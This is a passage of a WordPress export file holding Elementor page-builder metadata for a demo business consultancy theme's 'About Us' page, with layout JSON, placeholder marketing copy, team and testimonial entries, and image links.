		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaf1cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"120","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e209ac4","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100},"elements":[{"id":"34ca8c4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-about-us.jpg","id":491},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"-60","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1feb286","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"100","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"841e06b","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","subtitle_style":"is_line","stitle_color":"#95A2AC"},"elements":[],"widgetType":"iheading"},{"id":"bb4f4ed","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><hr \/><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"983ee34","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d77923","elType":"column","settings":{"_column_size":50,"_inline_size":null,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026"},"elements":[{"id":"0f29b46","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature-home4.png","id":1995},"image_size":"full","align":"left","align_tablet":"right","align_mobile":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"02cefd4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d2c189c","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"4146a85","elType":"widget","settings":{"editor":"<p>co-founder of company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6af12be","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"112","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"9865002","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"0c75221","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"number_typography_font_weight":"bold","title_typography_font_family":"Open Sans","title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"4efe597","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"3976936","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7d86b75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"75279d9","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7c9f8c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"5e295b7","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Open Sans","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"07bb3a8","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-about-us.jpg","id":504},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"117","right":"0","bottom":"66","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9fed965","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2ab48f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ad3790a","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ca838f8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ba65ecc","elType":"widget","settings":{"sub":"what we do","title":"Creating Your Startup Business","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_color":"#CCD5DB"},"elements":[],"widgetType":"iheading"},{"id":"260733b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bdb7238","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"658246c","elType":"widget","settings":{"image_boxes":[{"_id":"e6758bb","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":501},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":502},"title_box":"Management Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"112b6ab"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":503},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"8732ef5"}],"label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":false}],"isInner":false},{"id":"edf75b3","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"dda17b7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1b3917e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-about-us.png","id":508},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"3490ca0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"8df0dd7","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_margin":{"unit":"px","top":"-70","right":"0","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"9bcd87a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a428896","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"2c76de7","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"},{"id":"2e8f3f7","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"lbar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"d0493f4","elType":"section","settings":{"background_background":"classic","background_color":"#262832","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"bfd67a8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"829ba7d","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"0308eae","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"12b16f2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"61fb36b","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e5ca1cb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4431150","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"e15f0b3","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"dc4d425","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bec6367","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"324dce4","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"e76f400","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"beac444","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"eab9ff6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7fb7005","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"b8f3d6d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"532ec06","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"f9af862","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0e38994","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"9a95313","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"0b610b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2828095","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c25c0ad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f09ab14","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"ec58039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e65282d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"13da770","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f627004","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"35690a4","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-team","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:13:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:2;s:12:"align_tablet";i:1;s:12:"align_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:5:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}s:15:"_section_border";a:2:{s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:19:"_inline_size_mobile";i:4;}}s:5:"style";a:1:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:2;s:13:"margin_mobile";i:1;s:13:"margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:5;s:5:"title";i:5;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:5;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:5;s:28:"stitle_typography_typography";i:5;s:27:"stitle_typography_font_size";i:5;s:29:"stitle_typography_font_weight";i:5;s:14:"subtitle_style";i:2;s:12:"stitle_color";i:5;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:2;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:12;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:8;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:10;s:14:"padding_mobile";i:6;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:2;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:16:"background_color";i:1;s:15:"background_size";i:2;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:11:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_